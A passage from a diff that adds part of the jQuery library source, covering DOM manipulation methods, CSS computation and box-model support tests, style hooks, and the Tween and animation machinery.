instead of using delete, see Data#remove + elem[ dataUser.expando ] = undefined; + } + } + } + } +} ); + +jQuery.fn.extend( { + detach: function( selector ) { + return remove( this, selector, true ); + }, + + remove: function( selector ) { + return remove( this, selector ); + }, + + text: function( value ) { + return access( this, function( value ) { + return value === undefined ? + jQuery.text( this ) : + this.empty().each( function() { + if ( this.nodeType === 1 || this.nodeType === 11 || this.nodeType === 9 ) { + this.textContent = value; + } + } ); + }, null, value, arguments.length ); + }, + + append: function() { + return domManip( this, arguments, function( elem ) { + if ( this.nodeType === 1 || this.nodeType === 11 || this.nodeType === 9 ) { + var target = manipulationTarget( this, elem ); + target.appendChild( elem ); + } + } ); + }, + + prepend: function() { + return domManip( this, arguments, function( elem ) { + if ( this.nodeType === 1 || this.nodeType === 11 || this.nodeType === 9 ) { + var target = manipulationTarget( this, elem ); + target.insertBefore( elem, target.firstChild ); + } + } ); + }, + + before: function() { + return domManip( this, arguments, function( elem ) { + if ( this.parentNode ) { + this.parentNode.insertBefore( elem, this ); + } + } ); + }, + + after: function() { + return domManip( this, arguments, function( elem ) { + if ( this.parentNode ) { + this.parentNode.insertBefore( elem, this.nextSibling ); + } + } ); + }, + + empty: function() { + var elem, + i = 0; + + for ( ; ( elem = this[ i ] ) != null; i++ ) { + if ( elem.nodeType === 1 ) { + + // Prevent memory leaks + jQuery.cleanData( getAll( elem, false ) ); + + // Remove any remaining nodes + elem.textContent = ""; + } + } + + return this; + }, + + clone: function( dataAndEvents, deepDataAndEvents ) { + dataAndEvents = dataAndEvents == null ? false : dataAndEvents; + deepDataAndEvents = deepDataAndEvents == null ? dataAndEvents : deepDataAndEvents; + + return this.map( function() { + return jQuery.clone( this, dataAndEvents, deepDataAndEvents ); + } ); + }, + + html: function( value ) { + return access( this, function( value ) { + var elem = this[ 0 ] || {}, + i = 0, + l = this.length; + + if ( value === undefined && elem.nodeType === 1 ) { + return elem.innerHTML; + } + + // See if we can take a shortcut and just use innerHTML + if ( typeof value === "string" && !rnoInnerhtml.test( value ) && + !wrapMap[ ( rtagName.exec( value ) || [ "", "" ] )[ 1 ].toLowerCase() ] ) { + + value = jQuery.htmlPrefilter( value ); + + try { + for ( ; i < l; i++ ) { + elem = this[ i ] || {}; + + // Remove element nodes and prevent memory leaks + if ( elem.nodeType === 1 ) { + jQuery.cleanData( getAll( elem, false ) ); + elem.innerHTML = value; + } + } + + elem = 0; + + // If using innerHTML throws an exception, use the fallback method + } catch ( e ) {} + } + + if ( elem ) { + this.empty().append( value ); + } + }, null, value, arguments.length ); + }, + + replaceWith: function() { + var ignored = []; + + // Make the changes, replacing each non-ignored context element with the new content + return domManip( this, arguments, function( elem ) { + var parent = this.parentNode; + + if ( jQuery.inArray( this, ignored ) < 0 ) { + jQuery.cleanData( getAll( this ) ); + if ( parent ) { + parent.replaceChild( elem, this ); + } + } + + // Force callback invocation + }, ignored ); + } +} ); + +jQuery.each( { + appendTo: "append", + prependTo: "prepend", + insertBefore: "before", + insertAfter: "after", + replaceAll: "replaceWith" +}, function( name, original ) { + jQuery.fn[ name ] = function( selector ) { + var elems, + ret = [], + insert = jQuery( selector ), + last = insert.length - 1, + i = 0; + + for ( ; i <= last; i++ ) { + elems = i === last ? this : this.clone( true ); + jQuery( insert[ i ] )[ original ]( elems ); + + // Support: Android <=4.0 only, PhantomJS 1 only + // .get() because push.apply(_, arraylike) throws on ancient WebKit + push.apply( ret, elems.get() ); + } + + return this.pushStack( ret ); + }; +} ); +var rnumnonpx = new RegExp( "^(" + pnum + ")(?!px)[a-z%]+$", "i" ); + +var getStyles = function( elem ) { + + // Support: IE <=11 only, Firefox <=30 (#15098, #14150) + // IE throws on elements created in popups + // FF meanwhile throws on frame elements through "defaultView.getComputedStyle" + var view = elem.ownerDocument.defaultView; + + if ( !view || !view.opener ) { + view = window; + } + + return view.getComputedStyle( elem ); + }; + +var swap = function( elem, options, callback ) { + var ret, name, + old = {}; + + // Remember the old values, and insert the new ones + for ( name in options ) { + old[ name ] = elem.style[ name ]; + elem.style[ name ] = options[ name ]; + } + + ret = callback.call( elem ); + + // Revert the old values + for ( name in options ) { + elem.style[ name ] = old[ name ]; + } + + return ret; +}; + + +var rboxStyle = new RegExp( cssExpand.join( "|" ), "i" ); + + + +( function() { + + // Executing both pixelPosition & boxSizingReliable tests require only one layout + // so they're executed at the same time to save the second computation. + function computeStyleTests() { + + // This is a singleton, we need to execute it only once + if ( !div ) { + return; + } + + container.style.cssText = "position:absolute;left:-11111px;width:60px;" + + "margin-top:1px;padding:0;border:0"; + div.style.cssText = + "position:relative;display:block;box-sizing:border-box;overflow:scroll;" + + "margin:auto;border:1px;padding:1px;" + + "width:60%;top:1%"; + documentElement.appendChild( container ).appendChild( div ); + + var divStyle = window.getComputedStyle( div ); + pixelPositionVal = divStyle.top !== "1%"; + + // Support: Android 4.0 - 4.3 only, Firefox <=3 - 44 + reliableMarginLeftVal = roundPixelMeasures( divStyle.marginLeft ) === 12; + + // Support: Android 4.0 - 4.3 only, Safari <=9.1 - 10.1, iOS <=7.0 - 9.3 + // Some styles come back with percentage values, even though they shouldn't + div.style.right = "60%"; + pixelBoxStylesVal = roundPixelMeasures( divStyle.right ) === 36; + + // Support: IE 9 - 11 only + // Detect misreporting of content dimensions for box-sizing:border-box elements + boxSizingReliableVal = roundPixelMeasures( divStyle.width ) === 36; + + // Support: IE 9 only + // Detect overflow:scroll screwiness (gh-3699) + // Support: Chrome <=64 + // Don't get tricked when zoom affects offsetWidth (gh-4029) + div.style.position = "absolute"; + scrollboxSizeVal = roundPixelMeasures( div.offsetWidth / 3 ) === 12; + + documentElement.removeChild( container ); + + // Nullify the div so it wouldn't be stored in the memory and + // it will also be a sign that checks already performed + div = null; + } + + function roundPixelMeasures( measure ) { + return Math.round( parseFloat( measure ) ); + } + + var pixelPositionVal, boxSizingReliableVal, scrollboxSizeVal, pixelBoxStylesVal, + reliableTrDimensionsVal, reliableMarginLeftVal, + container = document.createElement( "div" ), + div = document.createElement( "div" ); + + // Finish early in limited (non-browser) environments + if ( !div.style ) { + return; + } + + // Support: IE <=9 - 11 only + // Style of cloned element affects source element cloned (#8908) + div.style.backgroundClip = "content-box"; + div.cloneNode( true ).style.backgroundClip = ""; + support.clearCloneStyle = div.style.backgroundClip === "content-box"; + + jQuery.extend( support, { + boxSizingReliable: function() { + computeStyleTests(); + return boxSizingReliableVal; + }, + pixelBoxStyles: function() { + computeStyleTests(); + return pixelBoxStylesVal; + }, + pixelPosition: function() { + computeStyleTests(); + return pixelPositionVal; + }, + reliableMarginLeft: function() { + computeStyleTests(); + return reliableMarginLeftVal; + }, + scrollboxSize: function() { + computeStyleTests(); + return scrollboxSizeVal; + }, + + // Support: IE 9 - 11+, Edge 15 - 18+ + // IE/Edge misreport `getComputedStyle` of table rows with width/height + // set in CSS while `offset*` properties report correct values. + // Behavior in IE 9 is more subtle than in newer versions & it passes + // some versions of this test; make sure not to make it pass there! + reliableTrDimensions: function() { + var table, tr, trChild, trStyle; + if ( reliableTrDimensionsVal == null ) { + table = document.createElement( "table" ); + tr = document.createElement( "tr" ); + trChild = document.createElement( "div" ); + + table.style.cssText = "position:absolute;left:-11111px"; + tr.style.height = "1px"; + trChild.style.height = "9px"; + + documentElement + .appendChild( table ) + .appendChild( tr ) + .appendChild( trChild ); + + trStyle = window.getComputedStyle( tr ); + reliableTrDimensionsVal = parseInt( trStyle.height ) > 3; + + documentElement.removeChild( table ); + } + return reliableTrDimensionsVal; + } + } ); +} )(); + + +function curCSS( elem, name, computed ) { + var width, minWidth, maxWidth, ret, + + // Support: Firefox 51+ + // Retrieving style before computed somehow + // fixes an issue with getting wrong values + // on detached elements + style = elem.style; + + computed = computed || getStyles( elem ); + + // getPropertyValue is needed for: + // .css('filter') (IE 9 only, #12537) + // .css('--customProperty) (#3144) + if ( computed ) { + ret = computed.getPropertyValue( name ) || computed[ name ]; + + if ( ret === "" && !isAttached( elem ) ) { + ret = jQuery.style( elem, name ); + } + + // A tribute to the "awesome hack by Dean Edwards" + // Android Browser returns percentage for some values, + // but width seems to be reliably pixels. + // This is against the CSSOM draft spec: + // https://drafts.csswg.org/cssom/#resolved-values + if ( !support.pixelBoxStyles() && rnumnonpx.test( ret ) && rboxStyle.test( name ) ) { + + // Remember the original values + width = style.width; + minWidth = style.minWidth; + maxWidth = style.maxWidth; + + // Put in the new values to get a computed value out + style.minWidth = style.maxWidth = style.width = ret; + ret = computed.width; + + // Revert the changed values + style.width = width; + style.minWidth = minWidth; + style.maxWidth = maxWidth; + } + } + + return ret !== undefined ? + + // Support: IE <=9 - 11 only + // IE returns zIndex value as an integer. + ret + "" : + ret; +} + + +function addGetHookIf( conditionFn, hookFn ) { + + // Define the hook, we'll check on the first run if it's really needed. + return { + get: function() { + if ( conditionFn() ) { + + // Hook not needed (or it's not possible to use it due + // to missing dependency), remove it. + delete this.get; + return; + } + + // Hook needed; redefine it so that the support test is not executed again. + return ( this.get = hookFn ).apply( this, arguments ); + } + }; +} + + +var cssPrefixes = [ "Webkit", "Moz", "ms" ], + emptyStyle = document.createElement( "div" ).style, + vendorProps = {}; + +// Return a vendor-prefixed property or undefined +function vendorPropName( name ) { + + // Check for vendor prefixed names + var capName = name[ 0 ].toUpperCase() + name.slice( 1 ), + i = cssPrefixes.length; + + while ( i-- ) { + name = cssPrefixes[ i ] + capName; + if ( name in emptyStyle ) { + return name; + } + } +} + +// Return a potentially-mapped jQuery.cssProps or vendor prefixed property +function finalPropName( name ) { + var final = jQuery.cssProps[ name ] || vendorProps[ name ]; + + if ( final ) { + return final; + } + if ( name in emptyStyle ) { + return name; + } + return vendorProps[ name ] = vendorPropName( name ) || name; +} + + +var + + // Swappable if display is none or starts with table + // except "table", "table-cell", or "table-caption" + // See here for display values: https://developer.mozilla.org/en-US/docs/CSS/display + rdisplayswap = /^(none|table(?!-c[ea]).+)/, + rcustomProp = /^--/, + cssShow = { position: "absolute", visibility: "hidden", display: "block" }, + cssNormalTransform = { + letterSpacing: "0", + fontWeight: "400" + }; + +function setPositiveNumber( _elem, value, subtract ) { + + // Any relative (+/-) values have already been + // normalized at this point + var matches = rcssNum.exec( value ); + return matches ? + + // Guard against undefined "subtract", e.g., when used as in cssHooks + Math.max( 0, matches[ 2 ] - ( subtract || 0 ) ) + ( matches[ 3 ] || "px" ) : + value; +} + +function boxModelAdjustment( elem, dimension, box, isBorderBox, styles, computedVal ) { + var i = dimension === "width" ? 1 : 0, + extra = 0, + delta = 0; + + // Adjustment may not be necessary + if ( box === ( isBorderBox ? "border" : "content" ) ) { + return 0; + } + + for ( ; i < 4; i += 2 ) { + + // Both box models exclude margin + if ( box === "margin" ) { + delta += jQuery.css( elem, box + cssExpand[ i ], true, styles ); + } + + // If we get here with a content-box, we're seeking "padding" or "border" or "margin" + if ( !isBorderBox ) { + + // Add padding + delta += jQuery.css( elem, "padding" + cssExpand[ i ], true, styles ); + + // For "border" or "margin", add border + if ( box !== "padding" ) { + delta += jQuery.css( elem, "border" + cssExpand[ i ] + "Width", true, styles ); + + // But still keep track of it otherwise + } else { + extra += jQuery.css( elem, "border" + cssExpand[ i ] + "Width", true, styles ); + } + + // If we get here with a border-box (content + padding + border), we're seeking "content" or + // "padding" or "margin" + } else { + + // For "content", subtract padding + if ( box === "content" ) { + delta -= jQuery.css( elem, "padding" + cssExpand[ i ], true, styles ); + } + + // For "content" or "padding", subtract border + if ( box !== "margin" ) { + delta -= jQuery.css( elem, "border" + cssExpand[ i ] + "Width", true, styles ); + } + } + } + + // Account for positive content-box scroll gutter when requested by providing computedVal + if ( !isBorderBox && computedVal >= 0 ) { + + // offsetWidth/offsetHeight is a rounded sum of content, padding, scroll gutter, and border + // Assuming integer scroll gutter, subtract the rest and round down + delta += Math.max( 0, Math.ceil( + elem[ "offset" + dimension[ 0 ].toUpperCase() + dimension.slice( 1 ) ] - + computedVal - + delta - + extra - + 0.5 + + // If offsetWidth/offsetHeight is unknown, then we can't determine content-box scroll gutter + // Use an explicit zero to avoid NaN (gh-3964) + ) ) || 0; + } + + return delta; +} + +function getWidthOrHeight( elem, dimension, extra ) { + + // Start with computed style + var styles = getStyles( elem ), + + // To avoid forcing a reflow, only fetch boxSizing if we need it (gh-4322). + // Fake content-box until we know it's needed to know the true value. + boxSizingNeeded = !support.boxSizingReliable() || extra, + isBorderBox = boxSizingNeeded && + jQuery.css( elem, "boxSizing", false, styles ) === "border-box", + valueIsBorderBox = isBorderBox, + + val = curCSS( elem, dimension, styles ), + offsetProp = "offset" + dimension[ 0 ].toUpperCase() + dimension.slice( 1 ); + + // Support: Firefox <=54 + // Return a confounding non-pixel value or feign ignorance, as appropriate. + if ( rnumnonpx.test( val ) ) { + if ( !extra ) { + return val; + } + val = "auto"; + } + + + // Support: IE 9 - 11 only + // Use offsetWidth/offsetHeight for when box sizing is unreliable. + // In those cases, the computed value can be trusted to be border-box. + if ( ( !support.boxSizingReliable() && isBorderBox || + + // Support: IE 10 - 11+, Edge 15 - 18+ + // IE/Edge misreport `getComputedStyle` of table rows with width/height + // set in CSS while `offset*` properties report correct values. + // Interestingly, in some cases IE 9 doesn't suffer from this issue. + !support.reliableTrDimensions() && nodeName( elem, "tr" ) || + + // Fall back to offsetWidth/offsetHeight when value is "auto" + // This happens for inline elements with no explicit setting (gh-3571) + val === "auto" || + + // Support: Android <=4.1 - 4.3 only + // Also use offsetWidth/offsetHeight for misreported inline dimensions (gh-3602) + !parseFloat( val ) && jQuery.css( elem, "display", false, styles ) === "inline" ) && + + // Make sure the element is visible & connected + elem.getClientRects().length ) { + + isBorderBox = jQuery.css( elem, "boxSizing", false, styles ) === "border-box"; + + // Where available, offsetWidth/offsetHeight approximate border box dimensions. + // Where not available (e.g., SVG), assume unreliable box-sizing and interpret the + // retrieved value as a content box dimension. + valueIsBorderBox = offsetProp in elem; + if ( valueIsBorderBox ) { + val = elem[ offsetProp ]; + } + } + + // Normalize "" and auto + val = parseFloat( val ) || 0; + + // Adjust for the element's box model + return ( val + + boxModelAdjustment( + elem, + dimension, + extra || ( isBorderBox ? "border" : "content" ), + valueIsBorderBox, + styles, + + // Provide the current computed size to request scroll gutter calculation (gh-3589) + val + ) + ) + "px"; +} + +jQuery.extend( { + + // Add in style property hooks for overriding the default + // behavior of getting and setting a style property + cssHooks: { + opacity: { + get: function( elem, computed ) { + if ( computed ) { + + // We should always get a number back from opacity + var ret = curCSS( elem, "opacity" ); + return ret === "" ? "1" : ret; + } + } + } + }, + + // Don't automatically add "px" to these possibly-unitless properties + cssNumber: { + "animationIterationCount": true, + "columnCount": true, + "fillOpacity": true, + "flexGrow": true, + "flexShrink": true, + "fontWeight": true, + "gridArea": true, + "gridColumn": true, + "gridColumnEnd": true, + "gridColumnStart": true, + "gridRow": true, + "gridRowEnd": true, + "gridRowStart": true, + "lineHeight": true, + "opacity": true, + "order": true, + "orphans": true, + "widows": true, + "zIndex": true, + "zoom": true + }, + + // Add in properties whose names you wish to fix before + // setting or getting the value + cssProps: {}, + + // Get and set the style property on a DOM Node + style: function( elem, name, value, extra ) { + + // Don't set styles on text and comment nodes + if ( !elem || elem.nodeType === 3 || elem.nodeType === 8 || !elem.style ) { + return; + } + + // Make sure that we're working with the right name + var ret, type, hooks, + origName = camelCase( name ), + isCustomProp = rcustomProp.test( name ), + style = elem.style; + + // Make sure that we're working with the right name. We don't + // want to query the value if it is a CSS custom property + // since they are user-defined. + if ( !isCustomProp ) { + name = finalPropName( origName ); + } + + // Gets hook for the prefixed version, then unprefixed version + hooks = jQuery.cssHooks[ name ] || jQuery.cssHooks[ origName ]; + + // Check if we're setting a value + if ( value !== undefined ) { + type = typeof value; + + // Convert "+=" or "-=" to relative numbers (#7345) + if ( type === "string" && ( ret = rcssNum.exec( value ) ) && ret[ 1 ] ) { + value = adjustCSS( elem, name, ret ); + + // Fixes bug #9237 + type = "number"; + } + + // Make sure that null and NaN values aren't set (#7116) + if ( value == null || value !== value ) { + return; + } + + // If a number was passed in, add the unit (except for certain CSS properties) + // The isCustomProp check can be removed in jQuery 4.0 when we only auto-append + // "px" to a few hardcoded values. + if ( type === "number" && !isCustomProp ) { + value += ret && ret[ 3 ] || ( jQuery.cssNumber[ origName ] ? "" : "px" ); + } + + // background-* props affect original clone's values + if ( !support.clearCloneStyle && value === "" && name.indexOf( "background" ) === 0 ) { + style[ name ] = "inherit"; + } + + // If a hook was provided, use that value, otherwise just set the specified value + if ( !hooks || !( "set" in hooks ) || + ( value = hooks.set( elem, value, extra ) ) !== undefined ) { + + if ( isCustomProp ) { + style.setProperty( name, value ); + } else { + style[ name ] = value; + } + } + + } else { + + // If a hook was provided get the non-computed value from there + if ( hooks && "get" in hooks && + ( ret = hooks.get( elem, false, extra ) ) !== undefined ) { + + return ret; + } + + // Otherwise just get the value from the style object + return style[ name ]; + } + }, + + css: function( elem, name, extra, styles ) { + var val, num, hooks, + origName = camelCase( name ), + isCustomProp = rcustomProp.test( name ); + + // Make sure that we're working with the right name. We don't + // want to modify the value if it is a CSS custom property + // since they are user-defined. + if ( !isCustomProp ) { + name = finalPropName( origName ); + } + + // Try prefixed name followed by the unprefixed name + hooks = jQuery.cssHooks[ name ] || jQuery.cssHooks[ origName ]; + + // If a hook was provided get the computed value from there + if ( hooks && "get" in hooks ) { + val = hooks.get( elem, true, extra ); + } + + // Otherwise, if a way to get the computed value exists, use that + if ( val === undefined ) { + val = curCSS( elem, name, styles ); + } + + // Convert "normal" to computed value + if ( val === "normal" && name in cssNormalTransform ) { + val = cssNormalTransform[ name ]; + } + + // Make numeric if forced or a qualifier was provided and val looks numeric + if ( extra === "" || extra ) { + num = parseFloat( val ); + return extra === true || isFinite( num ) ? num || 0 : val; + } + + return val; + } +} ); + +jQuery.each( [ "height", "width" ], function( _i, dimension ) { + jQuery.cssHooks[ dimension ] = { + get: function( elem, computed, extra ) { + if ( computed ) { + + // Certain elements can have dimension info if we invisibly show them + // but it must have a current display style that would benefit + return rdisplayswap.test( jQuery.css( elem, "display" ) ) && + + // Support: Safari 8+ + // Table columns in Safari have non-zero offsetWidth & zero + // getBoundingClientRect().width unless display is changed. + // Support: IE <=11 only + // Running getBoundingClientRect on a disconnected node + // in IE throws an error. + ( !elem.getClientRects().length || !elem.getBoundingClientRect().width ) ? + swap( elem, cssShow, function() { + return getWidthOrHeight( elem, dimension, extra ); + } ) : + getWidthOrHeight( elem, dimension, extra ); + } + }, + + set: function( elem, value, extra ) { + var matches, + styles = getStyles( elem ), + + // Only read styles.position if the test has a chance to fail + // to avoid forcing a reflow. + scrollboxSizeBuggy = !support.scrollboxSize() && + styles.position === "absolute", + + // To avoid forcing a reflow, only fetch boxSizing if we need it (gh-3991) + boxSizingNeeded = scrollboxSizeBuggy || extra, + isBorderBox = boxSizingNeeded && + jQuery.css( elem, "boxSizing", false, styles ) === "border-box", + subtract = extra ? + boxModelAdjustment( + elem, + dimension, + extra, + isBorderBox, + styles + ) : + 0; + + // Account for unreliable border-box dimensions by comparing offset* to computed and + // faking a content-box to get border and padding (gh-3699) + if ( isBorderBox && scrollboxSizeBuggy ) { + subtract -= Math.ceil( + elem[ "offset" + dimension[ 0 ].toUpperCase() + dimension.slice( 1 ) ] - + parseFloat( styles[ dimension ] ) - + boxModelAdjustment( elem, dimension, "border", false, styles ) - + 0.5 + ); + } + + // Convert to pixels if value adjustment is needed + if ( subtract && ( matches = rcssNum.exec( value ) ) && + ( matches[ 3 ] || "px" ) !== "px" ) { + + elem.style[ dimension ] = value; + value = jQuery.css( elem, dimension ); + } + + return setPositiveNumber( elem, value, subtract ); + } + }; +} ); + +jQuery.cssHooks.marginLeft = addGetHookIf( support.reliableMarginLeft, + function( elem, computed ) { + if ( computed ) { + return ( parseFloat( curCSS( elem, "marginLeft" ) ) || + elem.getBoundingClientRect().left - + swap( elem, { marginLeft: 0 }, function() { + return elem.getBoundingClientRect().left; + } ) + ) + "px"; + } + } +); + +// These hooks are used by animate to expand properties +jQuery.each( { + margin: "", + padding: "", + border: "Width" +}, function( prefix, suffix ) { + jQuery.cssHooks[ prefix + suffix ] = { + expand: function( value ) { + var i = 0, + expanded = {}, + + // Assumes a single number if not a string + parts = typeof value === "string" ? value.split( " " ) : [ value ]; + + for ( ; i < 4; i++ ) { + expanded[ prefix + cssExpand[ i ] + suffix ] = + parts[ i ] || parts[ i - 2 ] || parts[ 0 ]; + } + + return expanded; + } + }; + + if ( prefix !== "margin" ) { + jQuery.cssHooks[ prefix + suffix ].set = setPositiveNumber; + } +} ); + +jQuery.fn.extend( { + css: function( name, value ) { + return access( this, function( elem, name, value ) { + var styles, len, + map = {}, + i = 0; + + if ( Array.isArray( name ) ) { + styles = getStyles( elem ); + len = name.length; + + for ( ; i < len; i++ ) { + map[ name[ i ] ] = jQuery.css( elem, name[ i ], false, styles ); + } + + return map; + } + + return value !== undefined ? + jQuery.style( elem, name, value ) : + jQuery.css( elem, name ); + }, name, value, arguments.length > 1 ); + } +} ); + + +function Tween( elem, options, prop, end, easing ) { + return new Tween.prototype.init( elem, options, prop, end, easing ); +} +jQuery.Tween = Tween; + +Tween.prototype = { + constructor: Tween, + init: function( elem, options, prop, end, easing, unit ) { + this.elem = elem; + this.prop = prop; + this.easing = easing || jQuery.easing._default; + this.options = options; + this.start = this.now = this.cur(); + this.end = end; + this.unit = unit || ( jQuery.cssNumber[ prop ] ? "" : "px" ); + }, + cur: function() { + var hooks = Tween.propHooks[ this.prop ]; + + return hooks && hooks.get ? + hooks.get( this ) : + Tween.propHooks._default.get( this ); + }, + run: function( percent ) { + var eased, + hooks = Tween.propHooks[ this.prop ]; + + if ( this.options.duration ) { + this.pos = eased = jQuery.easing[ this.easing ]( + percent, this.options.duration * percent, 0, 1, this.options.duration + ); + } else { + this.pos = eased = percent; + } + this.now = ( this.end - this.start ) * eased + this.start; + + if ( this.options.step ) { + this.options.step.call( this.elem, this.now, this ); + } + + if ( hooks && hooks.set ) { + hooks.set( this ); + } else { + Tween.propHooks._default.set( this ); + } + return this; + } +}; + +Tween.prototype.init.prototype = Tween.prototype; + +Tween.propHooks = { + _default: { + get: function( tween ) { + var result; + + // Use a property on the element directly when it is not a DOM element, + // or when there is no matching style property that exists. + if ( tween.elem.nodeType !== 1 || + tween.elem[ tween.prop ] != null && tween.elem.style[ tween.prop ] == null ) { + return tween.elem[ tween.prop ]; + } + + // Passing an empty string as a 3rd parameter to .css will automatically + // attempt a parseFloat and fallback to a string if the parse fails. + // Simple values such as "10px" are parsed to Float; + // complex values such as "rotate(1rad)" are returned as-is. + result = jQuery.css( tween.elem, tween.prop, "" ); + + // Empty strings, null, undefined and "auto" are converted to 0. + return !result || result === "auto" ? 0 : result; + }, + set: function( tween ) { + + // Use step hook for back compat. + // Use cssHook if its there. + // Use .style if available and use plain properties where available. + if ( jQuery.fx.step[ tween.prop ] ) { + jQuery.fx.step[ tween.prop ]( tween ); + } else if ( tween.elem.nodeType === 1 && ( + jQuery.cssHooks[ tween.prop ] || + tween.elem.style[ finalPropName( tween.prop ) ] != null ) ) { + jQuery.style( tween.elem, tween.prop, tween.now + tween.unit ); + } else { + tween.elem[ tween.prop ] = tween.now; + } + } + } +}; + +// Support: IE <=9 only +// Panic based approach to setting things on disconnected nodes +Tween.propHooks.scrollTop = Tween.propHooks.scrollLeft = { + set: function( tween ) { + if ( tween.elem.nodeType && tween.elem.parentNode ) { + tween.elem[ tween.prop ] = tween.now; + } + } +}; + +jQuery.easing = { + linear: function( p ) { + return p; + }, + swing: function( p ) { + return 0.5 - Math.cos( p * Math.PI ) / 2; + }, + _default: "swing" +}; + +jQuery.fx = Tween.prototype.init; + +// Back compat <1.8 extension point +jQuery.fx.step = {}; + + + + +var + fxNow, inProgress, + rfxtypes = /^(?:toggle|show|hide)$/, + rrun = /queueHooks$/; + +function schedule() { + if ( inProgress ) { + if ( document.hidden === false && window.requestAnimationFrame ) { + window.requestAnimationFrame( schedule ); + } else { + window.setTimeout( schedule, jQuery.fx.interval ); + } + + jQuery.fx.tick(); + } +} + +// Animations created synchronously will run synchronously +function createFxNow() { + window.setTimeout( function() { + fxNow = undefined; + } ); + return ( fxNow = Date.now() ); +} + +// Generate parameters to create a standard animation +function genFx( type, includeWidth ) { + var which, + i = 0, + attrs = { height: type }; + + // If we include width, step value is 1 to do all cssExpand values, + // otherwise step value is 2 to skip over Left and Right + includeWidth = includeWidth ? 1 : 0; + for ( ; i < 4; i += 2 - includeWidth ) { + which = cssExpand[ i ]; + attrs[ "margin" + which ] = attrs[ "padding" + which ] = type; + } + + if ( includeWidth ) { + attrs.opacity = attrs.width = type; + } + + return attrs; +} + +function createTween( value, prop, animation ) { + var tween, + collection = ( Animation.tweeners[ prop ] || [] ).concat( Animation.tweeners[ "*" ] ), + index = 0, + length = collection.length; + for ( ; index < length; index++ ) { + if ( ( tween = collection[ index ].call( animation, prop, value ) ) ) { + + // We're done with this property + return tween; + } + } +} + +function defaultPrefilter( elem, props, opts ) { + var prop, value, toggle, hooks, oldfire, propTween, restoreDisplay, display, + isBox = "width" in props || "height" in props, + anim = this, + orig = {}, + style = elem.style, + hidden = elem.nodeType && isHiddenWithinTree( elem ), + dataShow = dataPriv.get( elem, "fxshow" ); + + // Queue-skipping animations hijack the fx hooks + if ( !opts.queue ) { + hooks = jQuery._queueHooks( elem, "fx" ); + if ( hooks.unqueued == null ) { + hooks.unqueued = 0; + oldfire = hooks.empty.fire; + hooks.empty.fire = function() { + if ( !hooks.unqueued ) { + oldfire(); + } + }; + } + hooks.unqueued++; + + anim.always( function() { + + // Ensure the complete handler is called before this completes + anim.always( function() { + hooks.unqueued--; + if ( !jQuery.queue( elem, "fx" ).length ) { + hooks.empty.fire(); + } + } ); + } ); + } + + // Detect show/hide animations + for ( prop in props ) { + value = props[ prop ]; + if ( rfxtypes.test( value ) ) { + delete props[ prop ]; + toggle = toggle || value === "toggle"; + if ( value === ( hidden ? "hide" : "show" ) ) { + + // Pretend to be hidden if this is a "show" and + // there is still data from a stopped show/hide + if ( value === "show" && dataShow && dataShow[ prop ] !== undefined ) { + hidden = true; + + // Ignore all other no-op show/hide data + } else { + continue; + } + } + orig[ prop ] = dataShow && dataShow[ prop ] || jQuery.style( elem, prop ); + } + } + + // Bail out if this is a no-op like .hide().hide() + propTween = !jQuery.isEmptyObject( props ); + if ( !propTween && jQuery.isEmptyObject( orig ) ) { + return; + } + + // Restrict "overflow" and "display" styles during box animations + if ( isBox && elem.nodeType === 1 ) { + + // Support: IE <=9 - 11, Edge 12 - 15 + // Record all 3 overflow attributes because IE does not infer the shorthand + // from identically-valued overflowX and overflowY and Edge just mirrors + // the overflowX value there. + opts.overflow = [ style.overflow, style.overflowX, style.overflowY ]; + + // Identify a display type, preferring old show/hide data over the CSS cascade + restoreDisplay = dataShow && dataShow.display; + if ( restoreDisplay == null ) { + restoreDisplay = dataPriv.get( elem, "display" ); + } + display = jQuery.css( elem, "display" ); + if ( display === "none" ) { + if ( restoreDisplay ) { + display = restoreDisplay; + } else { + + // Get nonempty value(s) by temporarily forcing visibility + showHide( [ elem ], true ); + restoreDisplay = elem.style.display || restoreDisplay; + display = jQuery.css( elem, "display" ); + showHide( [ elem ] ); + } + } + + // Animate inline elements as inline-block + if ( display === "inline" || display === "inline-block" && restoreDisplay != null ) { + if ( jQuery.css( elem, "float" ) === "none" ) { + + // Restore the original display value at the end of pure show/hide animations + if ( !propTween ) { + anim.done( function() { + style.display = restoreDisplay; + } ); + if ( restoreDisplay == null ) { + display = style.display; + restoreDisplay = display === "none" ? "" : display; + } + } + style.display = "inline-block"; + } + } + } + + if ( opts.overflow ) { + style.overflow = "hidden"; + anim.always( function() { + style.overflow = opts.overflow[ 0 ]; + style.overflowX = opts.overflow[ 1 ]; + style.overflowY = opts.overflow[ 2 ]; + } ); + } + + // Implement show/hide animations + propTween = false; + for ( prop in orig ) { + + // General show/hide setup for this element animation + if ( !propTween ) { + if ( dataShow ) { + if ( "hidden" in dataShow ) { + hidden = dataShow.hidden; + } + } else { + dataShow = dataPriv.access( elem, "fxshow", { display: restoreDisplay } ); + } + + // Store hidden/visible for toggle so `.stop().toggle()` "reverses" + if ( toggle ) { + dataShow.hidden = !hidden; + } + + // Show elements before animating them + if ( hidden ) { + showHide( [ elem ], true ); + } + + /* eslint-disable no-loop-func */ + + anim.done( function() { + + /* eslint-enable no-loop-func */ + + // The final step of a "hide" animation is actually hiding the element + if ( !hidden ) { + showHide( [ elem ] ); + } + dataPriv.remove( elem, "fxshow" ); + for ( prop in orig ) { + jQuery.style( elem, prop, orig[ prop ] ); + } + } ); + } + + // Per-property setup + propTween = createTween( hidden ? dataShow[ prop ] : 0, prop, anim ); + if ( !( prop in dataShow ) ) { + dataShow[ prop ] = propTween.start; + if ( hidden ) { + propTween.end = propTween.start; + propTween.start = 0; + } + } + } +} + +function propFilter( props, specialEasing ) { + var index, name, easing, value, hooks; + + // camelCase, specialEasing and expand cssHook pass + for ( index in props ) { + name = camelCase( index ); + easing = specialEasing[ name ]; + value = props[ index ]; + if ( Array.isArray( value ) ) { + easing = value[ 1 ]; + value = props[ index ] = value[ 0 ]; + } + + if ( index !== name ) { + props[ name ] = value; + delete props[ index ]; + } + + hooks = jQuery.cssHooks[ name ]; + if ( hooks && "expand" in hooks ) { + value = hooks.expand( value ); + delete props[ name ]; + + // Not quite $.extend, this won't overwrite existing keys. + // Reusing 'index' because we have the correct "name" + for ( index in value ) { + if ( !( index in props ) ) { + props[ index ] = value[ index ]; + specialEasing[ index ] = easing; + } + } + } else { + specialEasing[ name ] = easing; + } + } +} + +function Animation( elem, properties, options ) { + var result, + stopped, + index = 0, + length = Animation.prefilters.length, + deferred = jQuery.Deferred().always( function() { + + // Don't match elem in the :animated selector + delete 